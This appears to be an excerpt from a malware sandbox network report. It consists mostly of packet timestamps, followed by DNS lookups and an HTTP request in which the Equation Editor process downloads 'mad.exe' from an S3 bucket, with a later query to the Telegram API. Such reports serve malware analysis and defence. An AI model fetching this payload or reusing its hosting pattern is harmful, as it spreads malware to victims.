                                                  May 4, 2021 20:31:12.872090101 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872097015 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872109890 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872118950 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872131109 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872144938 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872154951 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872167110 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872184992 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872188091 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872194052 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872209072 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872226000 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872231007 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872239113 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872251034 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872267962 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872271061 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872281075 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872292042 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872311115 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872318029 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872319937 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872339964 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872359991 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872361898 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872374058 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872380972 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872390032 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872400999 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872416973 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872421026 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872430086 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872442961 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872456074 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872462988 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872468948 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872488976 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872500896 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872512102 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872530937 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872541904 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872548103 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872551918 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872559071 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872572899 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872589111 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872592926 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872601032 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872612953 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872629881 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872632980 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872642994 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872658968 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872668028 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872680902 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872698069 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872700930 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872709036 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872721910 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872735977 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872742891 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872745991 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872761965 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872778893 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872782946 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872790098 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872803926 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872819901 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872828007 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872832060 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872849941 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872863054 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872869968 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872875929 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872889996 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872906923 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872910976 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872920036 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872931004 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872950077 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872951031 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872960091 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.872971058 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.872986078 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873002052 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873019934 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873023987 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873044014 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873053074 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873060942 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873064995 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873085022 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873090982 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873101950 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873105049 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873112917 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873126030 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873146057 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873147011 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873162031 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873171091 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873183012 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873195887 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873212099 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873215914 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873219013 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873253107 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873261929 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873277903 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873294115 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873301983 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873311043 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873326063 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873339891 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873349905 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873368025 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873383045 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873379946 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873436928 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873442888 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873465061 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873490095 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873490095 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873498917 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873513937 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873527050 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873538971 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873553038 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873568058 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873594046 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873613119 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873619080 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873620987 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873625994 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873642921 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873653889 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873667955 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873670101 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873692989 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873707056 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873723984 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873723984 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873752117 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873766899 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873775959 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873779058 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873795033 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873800993 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873815060 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873827934 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873837948 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873852015 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873867035 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873877048 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873898983 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873900890 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873917103 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873933077 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873941898 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873960972 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873980045 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.873986006 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.873995066 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.874011040 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.874023914 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.874037027 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.874053955 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.874061108 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.874067068 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.874097109 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.877661943 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.877701998 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.877728939 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.877768040 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.877804995 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.877810001 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.896363020 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.897079945 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.968400955 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.968435049 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.968456030 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.968475103 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.968497992 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.968625069 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.968682051 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.969929934 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.969952106 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.970062971 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.977516890 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.977552891 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.977667093 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.988003969 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.988053083 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.988095045 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.988192081 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.988219976 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.990283012 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.990317106 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.990349054 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.990380049 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.990381002 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.990412951 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.990416050 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.990446091 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.990448952 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.990477085 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.990479946 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.990520954 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.990525007 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.990556955 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.990572929 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.990588903 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.990601063 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.990622044 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.990632057 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.990654945 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.990677118 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.990686893 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.990689039 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.990719080 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.990730047 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.990751028 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.990766048 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.990792036 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.990792990 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.990828037 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.990838051 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.990859032 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.990875006 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.990891933 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.990900993 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.990923882 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.990936041 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.990956068 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.990964890 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.990988016 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.991008997 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.991020918 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.991030931 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.991061926 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.991065025 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.991099119 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.991110086 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.991131067 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.991142988 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.991163015 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.991173029 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.991195917 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.991205931 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.991226912 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.991247892 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.991261959 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.991269112 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.991292000 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.991292953 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.991334915 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.991336107 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.991370916 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.991384029 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.991405010 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.991430998 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.991456985 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.991482019 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.991489887 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.991508007 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.991522074 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.991534948 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.991554022 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.991563082 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.991585970 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.991601944 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.991619110 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:12.991641045 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:12.991672993 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:13.017556906 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:13.017710924 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:13.075943947 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:13.075987101 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:13.076009989 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:13.076035976 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:13.076056957 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:13.076081038 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:13.076108932 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:13.076137066 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:13.076163054 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:13.076188087 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:13.076199055 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:13.076214075 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:13.076245070 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:13.076246023 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:13.076275110 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:13.076289892 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:13.076299906 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:13.076325893 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:13.076335907 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:13.076351881 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:13.076378107 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:13.076380014 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:13.076402903 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:13.076420069 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:13.076423883 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:13.076452971 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:13.076462030 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:13.076478958 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:13.076502085 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:13.076503992 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:13.076530933 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:13.076539993 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:13.076555967 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:13.076579094 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:13.076587915 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:13.076616049 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:13.076617956 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:13.076641083 CEST804916752.218.240.113192.168.2.22
                                                  May 4, 2021 20:31:13.076649904 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:13.076688051 CEST4916780192.168.2.2252.218.240.113
                                                  May 4, 2021 20:31:18.729940891 CEST4916780192.168.2.2252.218.240.113

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  May 4, 2021 20:31:09.510771036 CEST5219753192.168.2.228.8.8.8
                                                  May 4, 2021 20:31:09.571837902 CEST53521978.8.8.8192.168.2.22
                                                  May 4, 2021 20:31:09.572257996 CEST5219753192.168.2.228.8.8.8
                                                  May 4, 2021 20:31:09.630546093 CEST53521978.8.8.8192.168.2.22
                                                  May 4, 2021 20:33:21.528346062 CEST5309953192.168.2.228.8.8.8
                                                  May 4, 2021 20:33:21.577101946 CEST53530998.8.8.8192.168.2.22

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                  May 4, 2021 20:31:09.510771036 CEST192.168.2.228.8.8.80x2c09Standard query (0)miolouno.s3-us-west-2.amazonaws.comA (IP address)IN (0x0001)
                                                  May 4, 2021 20:31:09.572257996 CEST192.168.2.228.8.8.80x2c09Standard query (0)miolouno.s3-us-west-2.amazonaws.comA (IP address)IN (0x0001)
                                                  May 4, 2021 20:33:21.528346062 CEST192.168.2.228.8.8.80xc6c2Standard query (0)api.telegram.orgA (IP address)IN (0x0001)

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                  May 4, 2021 20:31:09.571837902 CEST8.8.8.8192.168.2.220x2c09No error (0)miolouno.s3-us-west-2.amazonaws.coms3-us-west-2-r-w.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                  May 4, 2021 20:31:09.571837902 CEST8.8.8.8192.168.2.220x2c09No error (0)s3-us-west-2-r-w.amazonaws.com52.218.240.113A (IP address)IN (0x0001)
                                                  May 4, 2021 20:31:09.630546093 CEST8.8.8.8192.168.2.220x2c09No error (0)miolouno.s3-us-west-2.amazonaws.coms3-us-west-2-r-w.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                  May 4, 2021 20:31:09.630546093 CEST8.8.8.8192.168.2.220x2c09No error (0)s3-us-west-2-r-w.amazonaws.com52.218.240.113A (IP address)IN (0x0001)
                                                  May 4, 2021 20:33:21.577101946 CEST8.8.8.8192.168.2.220xc6c2No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)

                                                  HTTP Request Dependency Graph

                                                  • miolouno.s3-us-west-2.amazonaws.com

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.224916752.218.240.11380C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  TimestampkBytes transferredDirectionData
                                                  May 4, 2021 20:31:09.848525047 CEST1OUTGET /mad.exe HTTP/1.1
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
